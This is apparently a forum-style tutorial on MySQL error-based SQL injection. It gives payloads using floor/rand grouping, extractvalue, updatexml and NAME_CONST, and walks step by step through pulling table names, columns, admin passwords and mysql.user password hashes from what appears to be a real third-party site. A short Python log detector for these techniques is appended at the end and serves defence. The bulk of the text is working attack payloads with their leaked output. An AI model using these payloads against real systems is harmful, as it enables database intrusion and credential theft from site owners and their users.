1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To query other data, replace the version() at that position with the expression to be queried.

For example, to query the administrator username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection techniques for newer MySQL versions: injection using NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
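Added example, not code from the original post or the tutorial it quotes: a small Python detector for both sections above that normalizes the query string of each access-log request, flags the four error-based primitives shown (floor/rand with group by, extractvalue, updatexml, and the double NAME_CONST derived table), and pulls the value out of the three MySQL error messages quoted on this page. The /content/detail.php endpoint, client address and log lines are constructed sample input.

```python
import re
from urllib.parse import unquote_plus

# Constructed detector, not code from the original post: flag the post's four
# MySQL error-based primitives in access logs and read leaked error values.
SIGNATURES = {
    "floor_rand_groupby": re.compile(r"(?=.*\bgroup by\b).*floor\(rand\(\d*\)\*2\)"),
    "extractvalue": re.compile(r"\bextractvalue\("),
    "updatexml": re.compile(r"\bupdatexml\("),
    "name_const_dup_column": re.compile(r"\bname_const\(.*\bname_const\("),
}
ERROR_LEAKS = [  # error strings the server leaks, as quoted in the post
    re.compile(r"duplicate entry '([^']*)' for key '[^']*'", re.I),
    re.compile(r"xpath syntax error: '([^']*)'", re.I),
    re.compile(r"duplicate column name '([^']*)'", re.I),
]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalize_query(target):
    """URL-decode ('+' and %XX), lower-case, and pull spaces off punctuation so
    spacing variants of one payload hit the same signature."""
    q = re.sub(r"\s+", " ", unquote_plus(target.partition("?")[2]).lower())
    return re.sub(r" ?([(),*=]) ?", r"\1", q)

def classify(target):
    q = normalize_query(target)
    return [name for name, pat in SIGNATURES.items() if pat.search(q)]

def scan_access_log(lines):
    """(client_ip, status, [techniques]) for each combined-format log line that matches."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := classify(m["target"])):
            findings.append((m["ip"], m["status"], hits))
    return findings

def leaked_value(error_text):
    """Value carried by a leaked MySQL error, or None. For group_key leaks the
    trailing digit is the floor(rand(0)*2) marker, so it is stripped."""
    for pat in ERROR_LEAKS:
        if m := pat.search(error_text):
            return m.group(1)[:-1] if "for key" in m.group(0) else m.group(1)
    return None

SAMPLE_LOG = [  # constructed lines: three of the post's payloads against a hypothetical /content/detail.php
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /content/detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 498',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /content/detail.php?id=1%20and%201=(updatexml(1,concat(0x3a,(select%20user())),1)) HTTP/1.1" 500 455',
]
```

A run of 500s from one client whose query strings hit these signatures is the signal to alert on; the leaked values show what the error page actually handed out.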